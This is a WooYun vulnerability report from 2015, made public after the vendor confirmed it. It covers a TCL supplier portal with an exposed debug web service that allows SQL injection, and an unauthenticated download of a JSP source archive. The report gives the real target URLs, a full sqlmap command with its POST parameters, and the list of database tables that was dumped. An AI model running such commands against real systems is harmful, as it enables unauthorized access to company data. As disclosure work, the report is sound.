当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105863

漏洞标题:tcl某站点多处信息泄漏导致sql注入

相关厂商:TCL官方网上商城

漏洞作者: 白非白

提交时间:2015-04-05 23:25

修复时间:2015-05-20 23:32

公开时间:2015-05-20 23:32

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-05: 细节已通知厂商并且等待厂商处理中
2015-04-05: 厂商已经确认,细节仅向厂商公开
2015-04-15: 细节向核心白帽子及相关领域专家公开
2015-04-25: 细节向普通白帽子公开
2015-05-05: 细节向实习白帽子公开
2015-05-20: 细节向公众公开

简要描述:

1.未授权访问导致的源码泄漏
2.信息泄漏导致的sql注入

详细说明:

1.信息泄漏导致的sql注入(看的越细,收获越多)
tcl某系统登录地址:http://srm.tclking.com(登录处没有注入)

4.png


查看网页源码,发现这个一个调试连接:http://srm.tclking.com/vmi/WebService/WS_Login.asmx/jsdebug
去掉调试参数jsdebug之后,直接访问这个地址:

http://srm.tclking.com/vmi/WebService/WS_Login.asmx


5.png


打开changepassword接口页面并且提交一个调用请求即产生报错:

http://srm.tclking.com/vmi/WebService/WS_Login.asmx?op=ChangePassWorld


6.png


直接放到sqlmap中跑:

c:\Python27>python.exe sqlmap\sqlmap.py -u "http://srm.tclking.com/vmi/WebServic
e/WS_Login.asmx/ChangePassWorld" --data="Account=test&OldPassWorld=1&NewPassWorl
d=1" --tables -D EIP


7.png


Database: EIP
[91 tables]
+------------------------+
| EIP_Custmast |
| H_Vmi_ocsupparmast |
| H_Vmi_ocsupparmast |
| H_Vmi_tgbom |
| H_Vmi_vmibom |
| HorizontalPlan |
| IN_ProBase |
| IN_Supplier |
| In_WHInComeDetail |
| In_WHInComeDetail |
| OA_Account |
| OA_AccountRight |
| OA_DocuMentList |
| OA_MainDocuMent |
| OA_SMS |
| Oa_Position |
| Oa_RightMast |
| PlanCtv |
| PlanDocumno |
| SM_OABusFlow |
| SM_TreeTest |
| SM_UserMast |
| VMI_ActFlow |
| VMI_Base |
| VMI_JudgeInfo |
| VMI_TempTable |
| VMI_facshop |
| VMI_orderseq |
| VMI_prOCBOMdetail_bak |
| VMI_prOCBOMdetail_bak |
| VMI_prOCBOMdetail_temp |
| Vmi_EmailRemind |
| Vmi_ForecastM |
| Vmi_ForecastM |
| Vmi_Modelmast |
| Vmi_OCProcess |
| Vmi_OCRemote |
| Vmi_OcClearFlag |
| Vmi_PRLog |
| Vmi_PartArrival |
| Vmi_RecentPlanM |
| Vmi_RecentPlanM |
| Vmi_SendIF |
| Vmi_autoRunLog |
| Vmi_dayplanM |
| Vmi_itemcontrol |
| Vmi_itemmast |
| Vmi_itemtemp |
| Vmi_line_cn |
| Vmi_mcbalance |
| Vmi_mcstock |
| Vmi_mcsuppar |
| Vmi_ocsupparmast |
| Vmi_ocsupparmast |
| Vmi_partrep |
| Vmi_prdetail |
| Vmi_prmaster |
| Vmi_reqdetail |
| Vmi_reqmast |
| Vmi_supmast |
| Vmi_tebombak |
| Vmi_tebombak |
| Vmi_tgbom |
| Vmi_txndetailh |
| Vmi_txndetailh |
| Vmi_txnheadh |
| Vmi_txnheadh |
| Vmi_userSsec |
| Vmi_userwsec |
| Vmi_vmibombak |
| Vmi_vmibombak |
| Vmi_whsmast |
| comnSms_Account |
| comnSms_Account |
| hr_dept |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| sqlmapoutput |
| sysdiagrams |
| temp_OcnoHead |
| vmi_OCPartSub |
| vmi_dayplandetail2 |
| vmi_dayplandetail_bak |
| vmi_dayplandetail_bak |
| vmi_dayplandetail_bak |
| vmi_octest |
| vmi_tempJX |
| vmi_transstock |
+------------------------+


2.未授权导致的源码泄漏(跟海尔的这个一样,使用了同一个系统 WooYun: 海尔某系统未授权访问致系统源码泄露
tcl某站点SAP NetWeaver Portal网址

http://srm.tclking.com:8000/logon/logonServlet


未授权访问路径

http://srm.tclking.com:8000//htmlb/jsp/jsp.zip


1.png


打开jsp.zip

2.png


3.png

漏洞证明:

存在多张用户表。

修复方案:

该网站两个端口的问题都要修复。

版权声明:转载请注明来源 白非白@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-05 23:31

厂商回复:

感谢你的工作,已转交相关单位处理。

最新状态:

暂无